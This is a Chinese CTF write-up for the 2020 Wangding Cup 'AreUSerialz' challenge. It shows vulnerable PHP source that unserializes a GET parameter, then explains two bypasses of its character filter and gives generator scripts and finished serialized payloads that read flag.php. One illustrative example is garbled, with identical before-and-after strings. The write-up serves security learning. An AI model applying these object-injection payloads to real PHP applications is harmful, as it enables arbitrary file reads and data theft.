[网鼎杯 2020 青龙组] AreUSerialz

源码是这样子的。

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

首先我们反序列化之后,要触发的是__destruct .

由于对象内部的参数都是 private,在反序列化时会产生不可见字符,无法通过 is_valid 的验证。

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

这里有俩种绕过方式:

1. 在 php7.1 以上版本,对 protected ,private 和 public 不敏感,可以直接改为 public 。

2. 把字符串类型 改成 16 进制类型,不可见字符 改成 \00 即可绕过。

比如:

对象 cat 的 name 是 private,序列化后为:

O:3:"cat“:1

改成

O:3:"cat“:1

此时我们就能构造反序列化了。让 op="2", 就可以读文件。

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

第一种方法,protected 改 public,提交远程就能得到 flag。

<?php

class FileHandler {

    public $op = 2;
    public $filename = "./flag.php";
    public $content;

}

$a = new FileHandler();
$str =  serialize($a);
echo $str;

//O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:10:"./flag.php";s:7:"content";N;}

?>

第二种方法,参数名 16 进制,俩种方法都能得到 flag

<?php

class FileHandler {

    protected $op = 2;
    protected $filename = "./flag.php";
    protected $content;

}

$a = new FileHandler();
$str =  serialize($a);
echo $str;

//O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:10:"./flag.php";s:10:"*content";N;}
//修改为16进制
//O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:10:"./flag.php";S:10:"\00*\00content";N;}